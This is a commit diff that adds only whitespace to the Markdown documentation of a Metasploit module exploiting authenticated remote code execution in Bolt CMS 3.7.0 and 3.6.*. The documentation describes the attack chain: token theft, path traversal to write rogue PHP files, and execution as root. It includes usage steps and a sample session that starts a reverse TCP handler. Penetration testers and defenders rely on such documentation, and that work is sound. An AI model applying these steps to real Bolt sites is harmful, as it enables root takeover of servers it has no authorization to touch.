Clean up module doc
This commit is contained in:
William Vu
parent
03b171f7f1
commit
72dbbedcfc
|
|
@ -1,4 +1,5 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits multiple vulnerabilities in Bolt CMS version 3.7.0 and 3.6.* in order to execute arbitrary commands as root.
|
||||
|
||||
This module first authenticates to Bolt CMS and visits the profile page to obtain a special token.
|
||||
|
|
@ -24,6 +25,7 @@ If a valid .php file is created, the module executes the payload as root via an
|
|||
The module requires valid credentials for a Bolt CMS user. This module has been successfully tested on Bolt CMS 3.7.0.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the module as usual
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/unix/webapp/bolt_authenticated_rce`
|
||||
|
|
@ -35,25 +37,31 @@ The module requires valid credentials for a Bolt CMS user. This module has been
|
|||
9. Do: `exploit`
|
||||
|
||||
## Options
|
||||
|
||||
### FILE_TRAVERSAL_PATH
|
||||
|
||||
This is the traversal path to get from the `/files/` directory on the web server to the `/root` directory on the server.
|
||||
It is used by the module to write rogue .php files to /root. The default value is `../../../public/files`.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
The password for the Bolt CMS account to authenticate with. This option is required.
|
||||
|
||||
### TARGETURI
|
||||
|
||||
The base path to Bolt CMS. The default value is `/`.
|
||||
|
||||
### USERNAME
|
||||
|
||||
The username for the Bolt CMS account to authenticate with. This option is required.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Bolt CMS 3.7.0 running on CentOS 7
|
||||
|
||||
```
|
||||
msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options
|
||||
|
||||
|
||||
Module options (exploit/unix/webapp/bolt_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
|
|
@ -90,7 +98,7 @@ Exploit target:
|
|||
|
||||
msf5 exploit(unix/webapp/bolt_authenticated_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.10:4444
|
||||
[*] Started reverse TCP handler on 192.168.1.10:4444
|
||||
[+] Successfully changed the /bolt/profile username to PHP $_GET variable "nbxnh".
|
||||
[*] Found 6 potential token(s) for creating .php files.
|
||||
[+] Used token a0293d73f435515024c2c5d37a to create phfsbswowfp.php.
|
||||
|
|
|
|||
Loading…
Reference in New Issue